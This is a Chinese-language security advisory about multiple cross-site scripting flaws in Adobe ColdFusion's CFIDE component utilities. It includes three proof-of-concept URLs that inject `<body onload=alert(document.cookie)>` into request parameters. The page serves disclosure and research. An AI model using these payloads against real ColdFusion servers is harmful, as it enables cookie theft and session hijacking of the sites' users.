发布日期:2011-09-27
更新日期:2011-09-27受影响系统:
Adobe ColdFusion
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49787Adobe ColdFusion是一个动态Web服务器。Adobe ColdFusion在实现上存在多个跨站脚本执行漏洞,远程攻击者可利用这些漏洞在受影响站点执行任意脚本代码,窃取cookie身份验证凭证。<*来源:MustLive (mustlive@websecurity.com.ua)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!MustLive (mustlive@websecurity.com.ua)提供了如下测试方法:
http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3Ehttp://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3Ehttp://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E建议:
--------------------------------------------------------------------------------
厂商补丁:Adobe
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.adobe.comPHP “is_a()”函数远程文件包含漏洞Wireshark多个安全漏洞相关资讯 Adobe Adobe漏洞
- Adobe 开始计划把 Creative Cloud (01月13日)
- Adobe 据传将会在十月推出新的移动 (08/27/2015 16:04:27)
- Adobe迈向云端 (03/17/2015 19:47:23)
| - Adobe 的新 App 让你简单创作漂亮 (12/19/2015 10:05:01)
- Adobe发布2015年Creative Cloud重 (06/18/2015 08:39:59)
- 别了Adobe,会步诺基亚摩托的后尘 (09/25/2014 06:42:00)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|